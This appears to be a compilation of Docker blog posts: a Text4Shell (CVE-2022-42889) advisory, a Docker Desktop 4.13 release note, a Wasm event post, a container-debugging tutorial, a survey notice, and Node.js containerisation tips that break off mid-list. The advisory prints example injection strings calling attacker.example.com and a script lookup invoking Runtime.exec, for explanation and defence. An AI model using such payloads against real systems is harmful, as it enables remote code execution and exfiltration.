Security Advisory: CVE-2022-42889 “Text4Shell”

What is it?

CVE-2022-42889, aka “Text4Shell”, is a vulnerability in the popular Java library “Apache Commons Text” which can result in arbitrary code execution when processing malicious input. More information can be found in the GitHub advisory or this Apache thread.

What can an attacker do?

If you’re vulnerable, an attacker can inject malicious input containing keywords which can trigger: 

- a DNS request
- a call to a remote URL
- an inline script to execute

These three mechanisms execute on the server and can trigger arbitrary code execution, pulling code from external sources or embedding arbitrary scripts.
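For illustration, malicious input exploits Commons Text’s interpolation syntax through the dns, url, and script lookup prefixes. The strings below are placeholder examples of that shape — the hostnames and command are illustrative, not taken from any real exploit:

${dns:address|attacker.example.com}
${url:UTF-8:https://attacker.example.com/payload}
${script:javascript:java.lang.Runtime.getRuntime().exec('...')}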

This makes the vulnerability highly serious. In many cases, however, consumers of this library won’t be vulnerable, either because they don’t use the StringSubstitutor class (see below) or because they don’t pass untrusted input into the vulnerable functions.

Security researchers are also reporting significant and increasing activity attempting to exploit this vulnerability.

Am I vulnerable?

To be vulnerable, you must:

- Use Apache Commons Text version 1.5-1.9 inclusive
- Have code using the StringSubstitutor class with variable interpolation
- Have a mechanism of accepting input and passing it into the StringSubstitutor class

Docker vulnerability scanning tools, including the docker scan CLI and Docker Hub Vulnerability Scanning (both powered by Snyk), will detect the presence of the vulnerable versions of the library and flag your image as vulnerable (see below).

Note that you may not be vulnerable even if you’re using these versions, as your code paths may already mitigate this by either not using the vulnerable methods, or by not passing user input into them (see the Mitigations section below). This may be difficult to validate, however, without understanding all the code paths in detail and where they may get input from. So the easiest fix is simply to upgrade all applications depending on vulnerable versions.

You can use docker scan to check if the image has the vulnerability. If Text4Shell is present, you will see a message in the output log like this:

✗ Arbitrary Code Execution (new) [High Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHECOMMONS-3043138] in org.apache.commons:commons-text@1.9
  introduced by org.apache.commons:commons-text@1.9
  Upgrade org.apache.commons:commons-text@1.9 to org.apache.commons:commons-text@1.10.0 to fix

To test this, you can check a vulnerable image. For example, this neo4j image contains a vulnerable version of commons-text at /var/lib/neo4j/lib/commons-text-1.9.jar:

docker scan neo4j:latest@sha256:17334cbc668d852ca8a3d8590f66c4fda64d9c7de7d93cc62803f534ae7dbce6

Docker Hub scans

As of 12:00 UTC 21 October 2022, Docker Hub now identifies the Text4Shell vulnerability and will badge any image it finds vulnerable. This badge will be publicly visible for Docker Official Images and Docker Verified Publisher images, and privately visible for any other images with vulnerability scanning enabled.

Scans before this date may not reflect this vulnerability; however, we will continue to scan older Docker Official and Docker Verified Publisher images and will update the badges as results come in.

If an image has been scanned and is found to be affected by the Text4Shell vulnerability, you’ll see a badge and details next to the image.

Mitigations

The safest mitigation is to update to version 1.10.0 of Apache Commons Text.

If updating to this version isn’t possible, the secondary mitigation is to check usage closely across your codebase and ensure untrusted user input isn’t being passed to the vulnerable functions.

Docker Official Images

A number of the Docker Official images do contain the vulnerable versions of Apache Commons Text. These will be publicly labeled in the Docker Hub user interface. For more detailed information on the current status of Docker Official Images please see https://docs.docker.com/security/.

Other images

We’re working with the Docker Verified Publishers to identify and update their affected images. We’re also looking at ways to highlight images that are affected, and we’ll continue to update this post as we have more information.

Is Docker infrastructure affected?

Docker Desktop and Docker Hub are not affected by the Text4Shell vulnerability. Docker largely builds its applications in Go, not Java. Although we do use some Java applications, we have confirmed we aren’t vulnerable to CVE-2022-42889.
Source: https://blog.docker.com/feed/

Control Dev Environments Better with Hardened Desktop (and More!)

Are you looking for even simpler and faster ways to do what you need in Docker Desktop? Whether you’re an admin looking for new ways to secure the supply chain or a developer who wants to discover new Docker Extensions or streamline your use of Dev Environments, Docker Desktop 4.13 has the updates you’re looking for. Read on to see what’s part of this release! 

Enhanced security and management for Docker Business customers

With this release, we’re introducing a new Docker Desktop security model: Hardened Docker Desktop. This model includes two new features for Docker Business customers — Settings Management and Enhanced Container Isolation.

Settings Management

With Settings Management, admins can configure Docker Desktop’s settings on client machines throughout their org. In the new admin-settings.json file, admins are able to configure important security settings like proxies and network ranges, and ensure that these values can’t be modified by users.
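To give a sense of the file’s shape, here’s a hypothetical sketch of an admin-settings.json. The key names below are illustrative assumptions — consult Docker’s Settings Management documentation for the actual schema:

{
  "configurationFileVersion": 2,
  "exposeDockerAPIOnTCP2375": { "locked": true, "value": false },
  "proxy": {
    "locked": true,
    "mode": "system"
  }
}

In this sketch, a "locked": true entry pins a setting so users can’t change it in the Docker Desktop UI.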

Enhanced Container Isolation

For an extra layer of security, admins can also enable Enhanced Container Isolation, which ensures that any configurations set with Settings Management cannot be modified by user containers. Enhanced Container Isolation ensures that all containers run unprivileged in the Docker Desktop Linux VM using the Linux user-namespace, as well as introducing a host of other security enhancements. These features are the first within Docker’s new Hardened Desktop security model for Docker Business customers, which provides more granular control over Docker Desktop’s Linux VM.

Docker Extensions Categories

The Docker Extension Marketplace continues to grow, with over 25 extensions added since we launched at DockerCon! With all of these new options, it might be hard to know which extension will benefit you the most in your day-to-day workflows.

That’s why in Docker Desktop 4.13, you can now search the Extensions Marketplace by title, description, or author. But there’s more — we also now provide a list of categories for filtering as per our roadmap issue.

The below screenshot shows the new categories that allow you to find useful extensions more easily. There are categories for Kubernetes, security, testing tools, and more! Are there any extensions you’d like to see in the Marketplace? Let us know here!

How can I categorize my extension?

If you plan to publish your extension to the Marketplace, you can specify which categories your extension belongs to. Add the label com.docker.extension.categories to the extension’s Dockerfile, followed by a list of comma-separated values with the category keys defined in the docs.

For instance:

LABEL com.docker.extension.categories="kubernetes,security"

Note that extensions published to the Marketplace before the 22nd of September 2022 have been auto-categorized by Docker, so if you’re the author of any of these, you don’t have to do anything.

Streamlined Dev Environments Experience

We’ve also made a number of improvements to Dev Environments with Docker Desktop 4.13:

CLI Plugin

Use the new docker dev CLI plugin to get the full Dev Environments experience from the terminal in addition to the Dashboard.

Launch from a Git repo

Now you can quickly launch a new environment from a Git repo:

docker dev create https://github.com/dockersamples/compose-dev-env

Simplified project configuration

Now all you need to get started is a compose-dev.yaml file. If you have an existing project with a .docker/ folder — don’t worry! It’ll be migrated automatically the next time you launch.
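If you’re starting from scratch, a compose-dev.yaml is just a Compose file. Here’s a minimal sketch — the service name and command are illustrative assumptions, not requirements of Dev Environments:

services:
  app:
    build: .
    command: sleep infinity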

Dev Environments is still in beta, and your feedback is more important than ever. You can submit feedback directly from the Dev Environments tab in Docker Desktop.

What other features would make your life easier?

Now that you’ve learned what’s new, let us know what you think! Is there a feature or extension that will make using Docker an even better experience for you? Check out our public roadmap to leave feedback and to see what else is coming.
Source: https://blog.docker.com/feed/

Docker and Wasm Working Together? Find Out How at Wasm Day NA

You may have seen some hype around WebAssembly, or Wasm, as it’s often called. It’s a relatively new technology that allows you to compile application code written in languages like Rust, C, C++, JavaScript, and Golang to bytecode, then run it inside a sandboxed environment.

So why all the hype? Well, those sandboxed environments can run in a large variety of locations — including your web browser using a JavaScript virtual machine. Not only does this mean the sandbox benefits from billions of dollars of investment in security, speed, and cross compatibility, it also means you can run existing code in your browser with some minor changes. And before you ask, yes, it can run Doom.

But running Doom in the browser is just one use case. Companies like WasmEdge are using Tensorflow to push the boundaries of what can be run with Wasm. Fermyon is building tools for Wasm to be used in microservices, while Vercel, Fastly, Shopify, and Cloudflare use Wasm for running code at the edge. Figma is using Wasm to provide higher performance in the browser for their application, and their new parent company Adobe is bringing their desktop applications to the Web using Wasm.

If all those examples don’t excite you about what’s possible with Wasm, I’m not sure what will!

How do Docker and Wasm fit together?

So what is Docker doing with Wasm? We see Wasm and containers as complementary technologies. The problem you’re solving will make one or the other more applicable, but they’re compatible, and should work well together in your cloud native application.

It really comes down to the use case. For example, Wasm’s quick startup time is great for short-lived operations, and its isolation is a good match when you need strict security guarantees enforceable at the code level. But as of now, it doesn’t have multithreading or garbage collection capabilities, so any use case with those requirements isn’t a good fit. It also requires you to rebuild your software from source.

Join Docker at Cloud Native Wasm Day

We’ll be at the Cloud Native Wasm Day NA in Detroit on October 24, as a Diamond sponsor, to talk about how we’re providing developers the tooling they need using development experiences they already know and love.

Justin Cormack, our CTO, will be presenting during the keynote. In his presentation, he’ll talk about how the container, Docker, and cloud native communities are embracing Wasm — and give some insights as to where we can go from here. If you’ve never seen him speak, I highly recommend it!

Michael Yuan (WasmEdge) and I will also be giving a talk to show how WASI and container workloads work together in Docker Desktop. You’ll find out when to use Wasm, the current tooling options for Wasm, and how to use Docker and Wasm together. We’ll even share download links to the Docker + Wasm preview so you can give it a try yourself!

If you’re attending the Cloud Native Wasm Day don’t miss our keynote and talk!
Source: https://blog.docker.com/feed/

How to Fix and Debug Docker Containers Like a Superhero

While containers help developers rapidly build and run cross-platform applications, creating error-free apps remains a constant challenge. And while it’s not always obvious how container errors occur, this mystery is even harder for newer developers to unravel. Figuring out how to debug Docker containers can seem daunting.

In this Community All-Hands session, Ákos Takács demonstrated how to solve many of these pesky problems and gain the superpower of fixing containers.

Each issue can impact your image builds and final applications. Some bugs may not trigger clear error messages. To further complicate things, source-code inspection isn’t always helpful. 

But, common container issues don’t have to be your kryptonite! We’ll share Ákos’ favorite tips and show you how to conquer these development challenges.

In this tutorial:

- Finding and fixing common container mistakes
- Using the CLI for extra container visibility
- Change your CLI output formatting for visibility and readability
- Remember to leverage your logs
- Tackle issues with ENTRYPOINT
- Access and inspect container content
- Dive deeply into files and folders
- Solve Docker Build errors
- Solve Docker Compose errors
- Optional: Make direct file edits within running containers
- Investigate less and develop more

Finding and fixing common container mistakes

Everyone is prone to the occasional silly mistake. You code when you’re tired, suffer from the occasional keyboard slip, or sometimes fail to copy text correctly between steps. These missteps can carry forward from one command to the next. And because easy-to-miss things like spelling errors or character omissions can fly under the radar, you’re left doing plenty of digging to solve basic problems. Nobody wants that, so what tools are at your disposal? 

Using the CLI for extra container visibility

Say we have an image downloaded from Docker Hub — any image at all — and use some variation of the docker run command to run it. The resulting container will be running the default command. If you want to surface that command, entering docker container ls --all will grab a list of containers with their respective commands.

Users often copy these commands and reuse them within other longer CLI commands. As you’d expect, it’s incredibly easy to highlight incorrectly, copy an incomplete phrase, and run a faulty command that uses it.

While spinning up a new container, you’ll hit a snag. The runtime in this instance will fail since Docker cannot find the executable. It’s not located in the PATH, which indicates a problem:

Running the docker container ls --all command also offers some hints. Note the httpd-foregroun container command paired with its created (but not running) container. Conversely, the v0 container that’s running successfully leverages a valid, complete command:

How do we investigate further? Use the docker run --rm -it --name MYCONTAINER [IMAGE] bash command to open an interactive terminal within your container. Take the container’s default command and attempt to run it again. A “command not found” error message will appear.

This is much more succinct and shows that you’ve likely entered the wrong command — in this case by forgetting a character. While Ákos’ example uses httpd, it’s applicable to almost any container image. 

Change your CLI output formatting for visibility and readability

Container commands are clipped once they exceed a certain length in the terminal output. That prevents you from inspecting the command in its entirety. 

Luckily, Ákos showed how the --format '{{ json . }}' | jq -C flag can improve how your terminal displays outputs. Instead of cutting off portions of text, here’s how your docker container ls --all result will look:

You can read and compare any parameters in full. Nothing is hidden. If you don’t have jq installed, you could instead enter the following command to display outputs similarly minus syntax highlighting. This beats the default tabular layout for troubleshooting:

docker container ls --all --format '{{ json . }}' | python3 -m json.tool --json-lines

Lastly, why not just expand the original table view while only displaying relevant information? Run the following command with the --no-trunc flag to expand those table rows and completely reveal each cell’s contents:

docker container ls --all --format 'table {{ .Names }}\t{{ .Status }}\t{{ .Command }}' --no-trunc

These examples highlight the importance of visibility and transparency in troubleshooting. When you can uncover and easily digest the information you need, making corrections is much easier.      

Remember to leverage your logs

Any application that follows best practices will produce log outputs while running within a Docker container. While you might view logging as a problem-catching mechanism, many running containers don’t experience issues.

Ákos believes it’s important to understand how normal log entries look. As a result, identifying abnormal log entries becomes that much easier. The docker logs command enables this:

The process of tuning your logs differs between tools and languages. For example, Ákos drew from methods involving httpd — like trace for detailed trace-level messages or LogLevel for filtering error messages — but these practices are widely applicable. You’ll probably want to zero in on startup and runtime errors to diagnose most issues. 

Log handling is configurable. Here are some common commands to help you drill down into container issues (and reduce noise):

Grab your container’s last 100 logs:

docker logs --tail 100 [container ID]

Grab all logs for a specific container:

docker logs [container ID]

View all active processes within a running container, should its logs be inaccessible:

docker top [container ID]

Log inspection enables easier remediation. Alongside Ákos, we agree that you should confirm any container changes or fixes after making them. This means you’ve taken the right steps and can move ahead.

Want to view all your logs together within Docker Desktop? Download our Logs Explorer extension, which lets you browse through your logs using filters and advanced search capabilities. You can even view new logs as they populate.

Tackle issues with ENTRYPOINT

When running applications, you’ll need to run executable files within your container. The ENTRYPOINT portion of your Dockerfile sets the main command within a container and basically assigns it a task. These ENTRYPOINT instructions rely on executable files being in the container. 

In Ákos’ example, he tackles a scenario where improper permissions can prevent Docker from successfully mounting and running an entrypoint.sh executable. You can copy his approach by doing the following: 

- Use the ls -l $PWD/examples/v6/entrypoint.sh command to view your file’s permissions, which may be inadequate.
- Confirm that permissions are incorrect, then run a chmod 774 command so the file can be read, written, and executed.
- Use docker run to spin up a container v7 from the original entrypoint, which may work briefly but soon stop running. Inspect the entrypoint.sh file to confirm our desired command exists (these steps are sketched as commands below).
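Concretely, those steps might look like the following sketch. The paths and container names follow Ákos’ example, and the final run exits shortly — which we diagnose next:

ls -l $PWD/examples/v7/entrypoint.sh
chmod 774 $PWD/examples/v7/entrypoint.sh
docker run -d -v $PWD/examples/v7/entrypoint.sh:/entrypoint.sh --entrypoint /entrypoint.sh --name v7-exiting httpd:2.4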

We can confirm this again by entering docker container inspect v7-exiting to view our container definition and parameters. While the Entrypoint is specified, its Cmd definition is null. That’s what’s causing the issue:

Why does this happen? Many don’t know that setting --entrypoint automatically empties the default command of any image that defines one. You’ll need to redefine your command for your container to work properly. Here’s how that CLI command might look:

docker run -d -v $PWD/examples/v7/entrypoint.sh:/entrypoint.sh --entrypoint /entrypoint.sh --name v7-running httpd:2.4 httpd-foreground

This works for any container image but we’re just drawing from an earlier example. If you run this and list your containers again, v7 will be active. Confirm within your logs that everything looks good. 

Access and inspect container content

Carefully managing files and system resources is critical during local development. That’s doubly true while working with multiple images, containers, or resource constraints. There are scenarios where your containers bloat as their contents accumulate over time. 

Keeping your files tidy is one thing. However, you may also want to copy your files from your container and move them into a temporary folder — using the docker cp command with a specified directory. Using a variation of ls -la ./var/v8, borrowing from Ákos’ example, then produces a list containing every file. 
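As a sketch of how that might look (the v8 container and paths come from the example), copy a directory out of the container and then list its contents:

docker cp v8:/usr/local/apache2 ./var/v8
ls -la ./var/v8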

This is great for visibility and confirming your container’s contents. And we can diagnose any issues one step further with docker container diff v8 to view which files have been changed, appended, or even deleted. If you’re experiencing strange container behavior, digging into these files might be useful. 

Dive deeply into files and folders

Close inspection is where hexdump comes in handy. The hexdump function converts your file into hexadecimal code, which is much more readable than binary. Ákos used the following commands:

docker cp v8:/usr/local/apache2/bin/httpd ./var/v8-httpd
hexdump -C -n 100 ./var/v8-httpd

You can adjust this -n number to read additional or fewer initial bytes. If your file contains text, this content will stand out and reveal the file’s main purpose. But, say you want to access a folder. While changing your directory and running docker container inspect … is standard, this method doesn’t work for Docker Desktop users. Since Desktop runs things in a VM, the host cannot access the folders within. 

Ákos showcased CTO Justin Cormack’s own nsenter1 image on GitHub, which lets us tap into those containers running with Docker Desktop environments. Docker Captain Bret Fisher has since expanded upon nsenter1’s documentation while adding useful commands. With these pieces in place, run the following command:

docker run --rm --privileged --pid=host alpine:3.16.2 nsenter -t 1 -m -u -i -n -p -- sh -c "cd $(docker container inspect v8 --format '{{ .GraphDriver.Data.UpperDir }}') && find ."

This command’s output mirrors that from our earlier docker container diff command. You can also run a hexdump using that same image above, which gives you the same troubleshooting abilities regardless of your environment. You can also inspect your entrypoint.sh to make important changes.  

Solve Docker Build errors 

While Docker BuildKit is quick and resilient, you can encounter errors that prevent image build completion. To learn why, run the following command to view each sequential build stage:

docker build $PWD/[MY SOURCE] --tag "MY TAG" --progress plain

BuildKit will provide readable context for each step and display any errors that occur:

If you see a missing file or directory error like the one above, don’t worry! You can use the cat $PWD/[MY SOURCE]/[MY DOCKERFILE] command to view the contents of your Dockerfile. Not only can you see where you misstepped more clearly, but you can also add a new instruction before the failing command to list your folder’s contents. 
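For instance, a hypothetical debugging instruction added just before the failing step might list the directory’s contents. The /usr/src/app path here is an assumption — use whatever WORKDIR your Dockerfile sets:

RUN ls -la /usr/src/app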

Maybe those contents need updating. Maybe your folder is empty! In that case, you need to update everything so docker build has something to leverage. 

Next, run the build command again with the --no-cache flag added. This flag tells Docker to cleanly build from scratch each time without relying on caching.
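Reusing the earlier build command, that might look like:

docker build $PWD/[MY SOURCE] --tag "MY TAG" --progress plain --no-cache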

You can progressively build updated versions of your Dockerfile and test those changes, given the cascading nature of instructions. Writing new instructions after the last working instruction — or making changes earlier on in your file — can eliminate those pesky build issues. Mechanisms like unlink or cp are helpful. The first behaves like rm while accepting only one argument, while cp copies critical files and folders into your image from a source.  

Solve Docker Compose errors

We use Docker Compose to spin up multiple services simultaneously using the docker compose --project-directory $PWD/[MY SOURCE] up -d command.

However, one or more of those containers might unexpectedly exit. Running docker compose --project-directory $PWD/[MY SOURCE] ps lists your services, so you can see which containers are running or exited.

To pinpoint the problem, you’d usually grab logs via the docker compose logs command. You won’t need to specify a project directory in most cases. However, your container produces no logs since it isn’t running. 

Next, run the cat $PWD/[MY SOURCE]/docker-compose.yml command to view your Docker Compose file’s contents. It’s likely that your services definitions need fixing, so digging line by line within the CLI is helpful. Enter the following command to make this output even clearer:

docker compose --project-directory $PWD/[MY SOURCE] config

Your container exits when the commands contained within are invalid — just like we saw earlier. You’ll be able to see if you’ve entered a command incorrectly or if that command is empty. From there, you can update your Compose file and re-run docker compose --project-directory $PWD/[MY SOURCE] up -d. You can now confirm that everything is working by listing your services again. Your terminal will also output logs!

Optional: Make direct file edits within running containers

Finally, it’s possible (and tempting) to directly edit your files within your container. This is viable while testing new changes and inspecting your containers. However, it’s usually considered best practice to create a new image and container instead. 

If you want to make edits within running containers, an editor like VS Code allows this, while IntelliJ doesn’t by comparison. Install the Docker extension for VS Code. You can then browse through your containers in the left sidebar, expand your collection of resources, and directly access important files. For example, web developers can directly edit their index.html files to change how user content is structured. 

Investigate less and develop more

Overall, the process of fixing a container, on the surface, may seem daunting to newer Docker users. The methods we’ve highlighted above can dramatically reduce that troubleshooting complexity — saving you time and effort. You can spend less time investigating issues and more time creating the applications users love. And we think those skills are pretty heroic. 

For more information, you can view Ákos Takács’ full presentation on YouTube to carefully follow each step. Want to dive deeper? Check out these additional resources to become a Docker expert: 

- Learn how to view logs for a container or service
- View our Docker Run reference documentation
- Learn about best practices for writing Dockerfiles
Source: https://blog.docker.com/feed/

State of Application Development Survey: Tell Us How You Develop!

Welcome to the first annual Docker State of Application Development survey! Please help us deepen our knowledge of the developer community with 20 minutes of your time. We want to know where developers are focused in 2023 so we can make sure our products continue to serve you effectively. Your participation helps us to build the best experiences for you!

Participation will also enter you into a raffle for a chance to win one of the following prizes*:

- 1 laptop computer (Apple M1 Pro 14” or HP Dev One)
- 3 Lego kits — choose from the Millennium Falcon™, App-Controlled Cat® D11 Bulldozer, or The Colosseum
- 2 consoles — choose from a PlayStation 5, Xbox Series X, or Nintendo Switch OLED
- 2 $300 Amazon.com gift cards
- Docker swag sets

We’ll choose the winners randomly from those who complete the survey with meaningful answers. The results of the prize draw will be announced via email on November 11, 2022.

We’ll release the data in a full report in January 2023 so you can see what we heard from all of you — and gain key insights into today’s application development experience.

We’ve already started getting responses from the 7+ million Docker users worldwide, and we want to make sure our results are as representative and inclusive as possible.

Click here to take the State of Application Development survey.

We greatly appreciate every contribution. Your voice counts!

*Docker State of Application Development Promotion Official Rules.
Source: https://blog.docker.com/feed/

9 Tips for Containerizing Your Node.js Application

Over the last five years, Node.js has maintained its position as a top platform among professional developers. It’s an open source, cross-platform JavaScript runtime environment designed to maximize throughput. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient — perfect for data intensive, real-time, and distributed applications. 

With over 90,500 stars and 24,400 forks, Node’s developer community is highly active. With more devs creating Node.js apps than ever before, finding efficient ways to build and deploy cross-platform is key. Let’s discuss how containerization can help before jumping into the meat of our guide.

Why is containerizing a Node application important?

Containerizing your Node application has numerous benefits. First, Docker’s friendly, CLI-based workflow lets any developer build, share, and run containerized Node applications. Second, developers can install their app from a single package and get it up and running in minutes. Third, Node developers can code and test locally while ensuring consistency from development to production.

We’ll show you how to quickly package your Node.js app into a container. We’ll also tackle key concerns that are easy to forget — like image vulnerabilities, image bloat, missing image tags, and poor build performance. Let’s explore a simple todo list app and discuss how our nine tips might apply.

Analyzing a simple todo list application

Let’s first consider a simple todo list application. This is a basic React application with a Node.js backend and a MongoDB database. The source code of the complete project is available within our GitHub samples repo.

Building the application

Luckily, we can build our sample application in just a few steps. First, you’ll want to clone the appropriate awesome-compose sample to use it with your project:

git clone https://github.com/dockersamples/awesome-compose/
cd awesome-compose/react-express-mongodb
docker compose -f docker-compose.yaml up -d

Second, enter the docker compose ps command to list out your services in the terminal. This confirms that everything is accounted for and working properly:

docker compose ps
NAME COMMAND SERVICE STATUS PORTS
backend "docker-entrypoint.s…" backend running 3000/tcp
frontend "docker-entrypoint.s…" frontend running 0.0.0.0:3000->3000/tcp
mongo "docker-entrypoint.s…" mongo running 27017/tcp

Third, open your browser and navigate to http://localhost:3000 to view your application in action. You’ll see your todo list UI and be able to directly interact with your application:

This is a great way to spin up a functional application in a short amount of time. However, remember that these samples are foundations you can build upon. They’re customizable to better suit your needs. And this can be important from a performance standpoint — since our above example isn’t fully optimized. Next, we’ll share some general optimization tips and more to help you build the best app possible. 

Our top nine tips for containerizing and optimizing Node applications

1) Use a specific base image tag instead of “version:latest”

When building Docker images, we always recommend specifying useful tags which codify version information, intended destination (prod or test, for instance), stability, or other useful information for deploying your application across environments.

Don’t rely on the latest tag that Docker automatically pulls, outside of local development. Using latest is unpredictable and may cause unexpected behavior. Each time you pull a latest image version, it could contain a new build or untested code that may break your application. 

Consider the following Dockerfile that uses the specific node:lts-buster Docker image as a base image instead of node:latest. This approach may be preferable since lts-buster is a stable image:

# Create image based on the official Node image from dockerhub
FROM node:lts-buster

# Create app directory
WORKDIR /usr/src/app

# Copy dependency definitions
COPY package.json ./package.json
COPY package-lock.json ./package-lock.json

# Install dependencies
#RUN npm set progress=false
# && npm config set depth 0
# && npm i install
RUN npm ci

# Get all the code needed to run the app
COPY . .

# Expose the port the app runs in
EXPOSE 3000

# Serve the app
CMD ["npm", "start"]

Overall, it’s often best to avoid using FROM node:latest in your Dockerfile.

2) Use a multi-stage build

With multi-stage builds, a Docker build can use one base image for compilation, packaging, and unit testing. A separate image holds the application’s runtime. This makes the final image more secure and shrinks its footprint (since it doesn’t contain development or debugging tools). Multi-stage Docker builds help ensure your builds are 100% reproducible and lean. You can create multiple stages within a Dockerfile to control how you build that image.

You can containerize your Node application using a multi-layer approach. Each layer may contain different app components like source code, resources, and even snapshot dependencies. What if we want to package our application into its own image like we mentioned earlier? Check out the following Dockerfile to see how it’s done:

FROM node:lts-buster-slim AS development

WORKDIR /usr/src/app

COPY package.json ./package.json
COPY package-lock.json ./package-lock.json
RUN npm ci

COPY . .

EXPOSE 3000

CMD [ "npm", "run", "dev" ]

FROM development as dev-envs
RUN <<EOF
apt-get update
apt-get install -y --no-install-recommends git
EOF

# install Docker tools (cli, buildx, compose)
COPY --from=gloursdocker/docker / /
CMD [ "npm", "run", "dev" ]

We first add an AS development label to the node:lts-buster-slim statement. This lets us refer to this build stage in other build stages. Next, we add a new stage labeled dev-envs. We’ll use this stage to run our development environment.

Now, let’s rebuild our image and run our development environment. We’ll use the same docker build command as above — while adding the --target dev-envs flag to specifically run that build stage:

docker build -t node-docker --target dev-envs .

3) Fix security vulnerabilities in your Node image

Today’s developers rely on third-party code and apps while building their services. External software can introduce unwanted vulnerabilities into your code if you’re not careful. Leveraging trusted images and continually monitoring your containers helps protect you.

Whenever you build a node:lts-buster-slim Docker image, Docker Desktop prompts you to run security scans of the image to detect any known vulnerabilities.

Let’s use the Snyk Extension for Docker Desktop to inspect our Node.js application. To begin, install Docker Desktop 4.8.0+ on your Mac, Windows, or Linux machine. Next, check the box within Settings > Extensions to Enable Docker Extensions.

You can then browse the Extensions Marketplace by clicking the “Add Extensions” button in the left sidebar, then searching for Snyk.

Snyk’s extension lets you rapidly scan both local and remote Docker images to detect vulnerabilities.

Install the Snyk extension and enter the node:lts-buster-slim Node Docker Official Image into the “Select image name” field. You’ll have to log into Docker Hub to start scanning. Don’t worry if you don’t have an account — it’s free and takes just a minute to create.

When running a scan, you’ll see this result within Docker Desktop:

Snyk uncovered 70 vulnerabilities of varying severity during this scan. Once you’re aware of these, you can begin remediation to fortify your image.

That’s not all. To perform a vulnerability check, you can use the docker scan command directly against your Dockerfile:

docker scan -f Dockerfile node:lts-buster-slim

4) Leverage HEALTHCHECK

The HEALTHCHECK instruction tells Docker how to test a container and confirm that it’s still working. For example, this can detect when a web server is stuck in an infinite loop and cannot handle new connections — even though the server process is still running.

When an application reaches production, an orchestrator like Kubernetes or a service fabric will most likely manage it. By using HEALTHCHECK, you’re sharing the status of your containers with the orchestrator to enable configuration-based management tasks. Here’s an example:

# syntax=docker/dockerfile:1.4

FROM node:lts-buster-slim AS development

# Create app directory
WORKDIR /usr/src/app

COPY package.json ./package.json
COPY package-lock.json ./package-lock.json
RUN npm ci

COPY . .

EXPOSE 3000

CMD [ "npm", "run", "dev" ]

FROM development as dev-envs
RUN <<EOF
apt-get update
apt-get install -y --no-install-recommends git
EOF

RUN <<EOF
useradd -s /bin/bash -m vscode
groupadd docker
usermod -aG docker vscode
EOF

HEALTHCHECK CMD curl --fail http://localhost:3000 || exit 1

# install Docker tools (cli, buildx, compose)
COPY --from=gloursdocker/docker / /
CMD [ "npm", "run", "dev" ]

When HEALTHCHECK is present in a Dockerfile, you’ll see the container’s health in the STATUS column after running the docker ps command. A container that passes this check is healthy. The CLI will label unhealthy containers as unhealthy:

docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
1d0c5e3e7d6a react-express-mongodb-frontend "docker-entrypoint.s…" 23 seconds ago Up 21 seconds (health: starting) 0.0.0.0:3000->3000/tcp frontend
a89721d3c42d react-express-mongodb-backend "docker-entrypoint.s…" 23 seconds ago Up 21 seconds (health: starting) 3000/tcp backend
194c953f5653 mongo:4.2.0 "docker-entrypoint.s…" 3 minutes ago Up 3 minutes 27017/tcp mongo

You can also define a healthcheck (note the case difference) within Docker Compose! This can be pretty useful when you’re not using a Dockerfile. Instead of writing a plain text instruction, you’ll write this configuration in YAML format. 

Here’s a sample configuration that lets you define healthcheck within your docker-compose.yml file:

backend:
  container_name: backend
  restart: always
  build: backend
  volumes:
    - ./backend:/usr/src/app
    - /usr/src/app/node_modules
  depends_on:
    - mongo
  networks:
    - express-mongo
    - react-express
  expose:
    - 3000
  healthcheck:
    test: ["CMD", "curl", "-f", "http://localhost:3000"]
    interval: 1m30s
    timeout: 10s
    retries: 3
    start_period: 40s

5) Use .dockerignore

To increase build performance, we recommend creating a .dockerignore file in the same directory as your Dockerfile. For this tutorial, your .dockerignore file should contain just one line:

node_modules

This line excludes the node_modules directory — which contains output from npm — from the Docker build context. There are many good reasons to carefully structure a .dockerignore file, but this simple file is good enough for now.

Let’s now explain the build context and why it’s essential. The docker build command builds Docker images from a Dockerfile and a “context.” This context is the set of files located in your specified PATH or URL. The build process can reference any of these files.

Meanwhile, the compilation context is where the developer works. It could be a folder on Mac, Windows, or a Linux directory. This directory contains all necessary application components like source code, configuration files, libraries, and plugins. With a .dockerignore file, we can determine which of these elements — source code, configuration files, libraries, plugins, and so on — to exclude while building your new image.

Here’s how your .dockerignore file might look if you choose to exclude the node_modules directory from your build — in the sample project, both the backend and frontend directories carry a .dockerignore file with that single node_modules line.

6) Run as a non-root user for security purposes

Running applications with restricted user privileges is safer since it helps mitigate risks. The same applies to Docker containers. By default, Docker containers and their running apps have root privileges. It’s therefore best to run Docker containers as non-root users.

You can do this by adding USER instructions within your Dockerfile. The USER instruction sets the preferred user name (or UID) and optionally the user group (or GID) while running the image — and for any subsequent RUN, CMD, or ENTRYPOINT instructions:

FROM node:lts-buster AS development

WORKDIR /usr/src/app

COPY package.json ./package.json
COPY package-lock.json ./package-lock.json

RUN npm ci

COPY . .

EXPOSE 3000

CMD ["npm", "start"]

FROM development as dev-envs
RUN <<EOF
apt-get update
apt-get install -y --no-install-recommends git
EOF

RUN <<EOF
useradd -s /bin/bash -m vscode
groupadd docker
usermod -aG docker vscode
EOF
# install Docker tools (cli, buildx, compose)
COPY --from=gloursdocker/docker / /
CMD [ "npm", "start" ]
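Note that the Dockerfile above creates a vscode user but, as written, never switches to it. To actually drop root privileges, you’d add a USER instruction after the user is created — a minimal sketch:

USER vscode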

7) Favor multi-architecture Docker images

Your CPU can only run binaries for its native architecture. For example, Docker images built for an x86 system can’t run on an Arm-based system. With Apple fully transitioning to their custom Arm-based silicon, it’s possible that your x86 (Intel or AMD) container image won’t work with Apple’s M-series chips. 

Consequently, we always recommend building multi-arch container images. Below is the mplatform/mquery Docker image that lets you query the multi-platform status of any public image in any public registry:

docker run --rm mplatform/mquery node:lts-buster
Unable to find image 'mplatform/mquery:latest' locally
d0989420b6f0: Download complete
af74e063fc6e: Download complete
3441ed415baf: Download complete
a0c6ee298a93: Download complete
894bcacb16df: Downloading [=============================================> ] 3.146MB/3.452MB
Image: node:lts-buster (digest: sha256:a5d9200d3b8c17f0f3d7717034a9c215015b7aae70cb2a9d5e5dae7ff8aa6ca8)
* Manifest List: Yes (Image type: application/vnd.docker.distribution.manifest.list.v2+json)
* Supported platforms:
– linux/amd64
– linux/arm/v7
– linux/arm64/v8

